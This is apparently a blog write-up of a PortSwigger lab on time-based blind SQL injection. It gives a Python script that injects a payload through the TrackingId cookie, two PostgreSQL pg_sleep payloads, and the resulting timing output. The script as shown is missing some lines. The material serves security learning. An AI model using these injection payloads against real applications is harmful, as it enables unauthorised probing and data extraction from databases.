Blind SQL injection with time delays | Dec 9, 2022
Welcome to my another writeup! In this Portswigger Labs lab, you'll learn: Blind SQL injection with time delays! Without further ado, let's dive in.
- Overall difficulty for me (From 1-10 stars): ★☆☆☆☆☆☆☆☆☆
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.
Home page:
Tracking cookie:
In the previous labs, we found that there is a blind SQL injection vulnerability in the tracking cookie.
For the sake of automation, I'll write a python script:
#!/usr/bin/env python3
import requests
from time import time
import urllib.parse
def main():
url = ''
payload = """PAYLOAD_HERE"""
finalPayload = urllib.parse.quote(payload)
cookie = {
'session': 'YOUR_SESSIONID',
'TrackingId': finalPayload
startTime = time()
requests.get(url, cookies=cookie)
endTime = time()
finalTime = endTime - startTime
if finalTime >= 10:
print(f'[+] Payload triggered, slept for {finalTime:.2f}s')
print(f'[-] Payload didn\'t trigger, slept for {finalTime:.2f}s')
if __name__ == '__main__':
To trigger a Time-Based SQL injection, we use the following payloads: (From PortSwigger's SQL injection cheat sheet)
After some fumbling around, I found PostgreSQL time delay payload works:
# Payload 1:
payload = """';SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--"""
# Payload 2:
payload = """';SELECT CASE WHEN (1=2) THEN pg_sleep(10) ELSE pg_sleep(0) END--"""
# Payload 1:
└─# python3
[+] Payload triggered, slept for 11.27s
# Payload 2:
└─# python3
[-] Payload didn't trigger, slept for 0.92s
What we've learned:
- Blind SQL injection with time delays